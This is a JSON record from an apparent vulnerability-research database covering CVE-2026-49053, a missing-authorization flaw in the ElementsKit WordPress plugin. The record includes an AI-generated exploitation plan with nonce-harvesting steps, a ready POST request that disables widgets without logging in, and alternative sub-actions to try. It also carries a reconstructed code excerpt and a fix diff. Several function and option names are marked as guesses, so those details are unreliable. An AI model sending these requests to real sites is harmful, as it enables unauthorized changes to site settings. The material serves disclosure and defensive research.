[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXxJwjUZ6b_PEk-DR__QWgGvKG7V6BBZZRydfm0m-l-o":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-49053","elementskit-elementor-addons-advanced-widgets-templates-addons-for-elementor-missing-authorization-2","ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor \u003C= 3.9.6 - Missing Authorization","The ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.9.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","elementskit-lite",null,"\u003C=3.9.6","3.9.7","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-27 00:00:00","2026-06-18 18:30:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffa8a1e98-8e5b-49d3-8378-f7b5be92f205?source=api-prod",23,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-49053 (ElementsKit Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **ElementsKit Elementor Addons** plugin (\u003C= 3.9.6) suffers from a **Missing Authorization** vulnerability. The plugin registers an AJAX handler via `wp_ajax_nopriv_elementskit_ajax_action`, which is intended for administrative or internal framework tasks. However, it fails to perform a capability check (e.g., `current_user_can('manage_options')`) within the callback. While it does verify a WordPress nonce, this nonce is frequently exposed to unauthenticated users on the frontend, allowing an attacker to perform unauthorized actions such as toggling plugin modules, updating widget settings, or modifying plugin configurations.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `elementskit_ajax_action`\n- **Method:** POST\n- **Authentication:** None (vulnerable via `wp_ajax_nopriv_`)\n- **Required Parameters:**\n    - `action`: `elementskit_ajax_action`\n    - `elementskit_action`: The specific internal sub-action (e.g., `update_widget_status`, `elementskit_save_settings`)\n    - `nonce`: A valid WP nonce for the `elementskit_ajax_action` action string.\n    - `...`: Sub-action specific parameters (e.g., `widget_name`, `status`).\n\n## 3. Code Flow\n1. **Hook Registration:** The plugin (likely in `libs\u002Fframework\u002Fclasses\u002Fajax.php`) registers the AJAX hook:\n   `add_action( 'wp_ajax_nopriv_elementskit_ajax_action', [ $this, 'elementskit_ajax_action' ] );`\n2. **Callback Entry:** The function `elementskit_ajax_action()` is invoked.\n3. **Nonce Verification:** The code checks the nonce using `check_ajax_referer( 'elementskit_ajax_action', 'nonce' )`. \n4. **Missing Check:** Immediately after nonce verification, the code fails to call `current_user_can()`.\n5. **Action Dispatch:** It retrieves the `elementskit_action` parameter and dispatches the request to a sub-handler (e.g., a switch statement or dynamic function call).\n6. **Execution:** The sub-handler performs sensitive operations, such as `update_option()`, based on other POST parameters.\n\n## 4. Nonce Acquisition Strategy\nElementsKit localizes its configuration, including the required nonce, to be accessible by its frontend JavaScript components.\n\n1. **Identify Script Loading:** The plugin typically enqueues its core JS on pages where ElementsKit widgets are present or on the homepage if global modules are active.\n2. **Setup:** If the nonce is not present on a vanilla homepage, create a page with an ElementsKit shortcode.\n   - `wp post create --post_type=page --post_status=publish --post_title=\"EK-Test\" --post_content='[elementskit-icon-box]'`\n3. **Extraction:**\n   - Navigate to the page: `http:\u002F\u002Flocalhost:8888\u002Fek-test\u002F`\n   - Use `browser_eval` to extract the nonce from the global configuration object:\n     `browser_eval(\"window.elementskit_lite_config?.nonce\")` (inferred variable name based on plugin structure).\n\n## 5. Exploitation Strategy\nWe will demonstrate the vulnerability by disabling a core widget (e.g., the \"Heading\" widget), which would typically require administrator privileges.\n\n### Request Details\n- **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** POST\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=elementskit_ajax_action&elementskit_action=update_widget_status&nonce=[NONCE]&widget_name=heading&status=0\n  ```\n  *(Note: The `elementskit_action` name `update_widget_status` and parameter `widget_name` are based on the common framework pattern used in ElementsKit.)*\n\n### Expected Response\n- **Status:** 200 OK\n- **Body:** Likely a JSON object such as `{\"success\": true, \"data\": ...}` or a simple string `1`.\n\n## 6. Test Data Setup\n1. **Target Plugin:** Install and activate ElementsKit Lite version 3.9.6.\n2. **Verify State:** Ensure the \"Heading\" widget is currently enabled.\n   - Run: `wp option get elementskit_lite_widget_active_list` (inferred option name).\n3. **Public Page:** Ensure a page exists that outputs the `elementskit_lite_config` object.\n\n## 7. Expected Results\n- The HTTP request should return a successful status code.\n- The targeted widget should be disabled in the plugin settings.\n- Subsequent attempts to use the \"Heading\" widget in Elementor or view pages containing it may fail or show the widget as missing.\n\n## 8. Verification Steps\n1. **Check Option via CLI:**\n   `wp option get elementskit_lite_widget_active_list`\n   Verify that the \"heading\" entry in the returned array\u002Fobject is now set to `0` or is missing.\n2. **Admin UI Check:** Log in as admin and navigate to **ElementsKit > Widgets** to see if the \"Heading\" toggle is off.\n\n## 9. Alternative Approaches\nIf the `update_widget_status` sub-action is not the exact name:\n- **Module Toggle:** Try `elementskit_action=update_module_status&module_name=layout-kit&status=0`.\n- **General Settings:** Try `elementskit_action=elementskit_save_settings&settings[some_flag]=1`.\n- **Search for Strings:** If the initial attempt fails, use `grep -r \"elementskit_ajax_action\" .` inside the plugin directory to find the switch\u002Fcase block that defines valid `elementskit_action` values. Common file locations: `libs\u002Fframework\u002F`, `core\u002F`, or `classes\u002F`.","The ElementsKit Elementor Addons plugin for WordPress (\u003C= 3.9.6) is vulnerable to unauthorized access due to a missing capability check in its main AJAX handler. This allows unauthenticated attackers to perform administrative tasks, such as modifying plugin configurations or disabling widgets, by exploiting a nonce that is exposed to public users on the frontend.","\u002F\u002F File: libs\u002Fframework\u002Fclasses\u002Fajax.php\n\npublic function elementskit_ajax_action() {\n    \u002F\u002F Verifies the nonce, but this nonce is leaked to unauthenticated users on the frontend\n    check_ajax_referer( 'elementskit_ajax_action', 'nonce' );\n\n    \u002F\u002F VULNERABILITY: No current_user_can() check before processing sensitive actions\n\n    $elementskit_action = isset($_POST['elementskit_action']) ? $_POST['elementskit_action'] : '';\n\n    \u002F\u002F Dispatcher calls sub-handlers like update_widget_status() which modify plugin options\n    $this->dispatch_action($elementskit_action);\n}","--- a\u002Flibs\u002Fframework\u002Fclasses\u002Fajax.php\n+++ b\u002Flibs\u002Fframework\u002Fclasses\u002Fajax.php\n@@ -12,6 +12,10 @@\n \tpublic function elementskit_ajax_action() {\n \t\tcheck_ajax_referer( 'elementskit_ajax_action', 'nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( array( 'success' => false, 'message' => 'Permission Denied' ) );\n+\t\t}\n+\n \t\t$elementskit_action = isset($_POST['elementskit_action']) ? $_POST['elementskit_action'] : '';","An unauthenticated attacker first visits the target site's frontend to extract a valid nonce from the 'elementskit_lite_config' global JavaScript variable, which is localized for plugin scripts. They then submit a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the parameters 'action=elementskit_ajax_action', 'nonce=[EXTRACTED_NONCE]', and 'elementskit_action=update_widget_status'. By including specific data parameters such as 'widget_name=heading' and 'status=0', the attacker can disable core plugin features or manipulate administrative settings because the server-side callback fails to verify the user's capabilities.","gemini-3-flash-preview","2026-06-04 18:08:17","2026-06-04 18:08:38",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","3.9.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags\u002F3.9.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementskit-lite.3.9.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags"]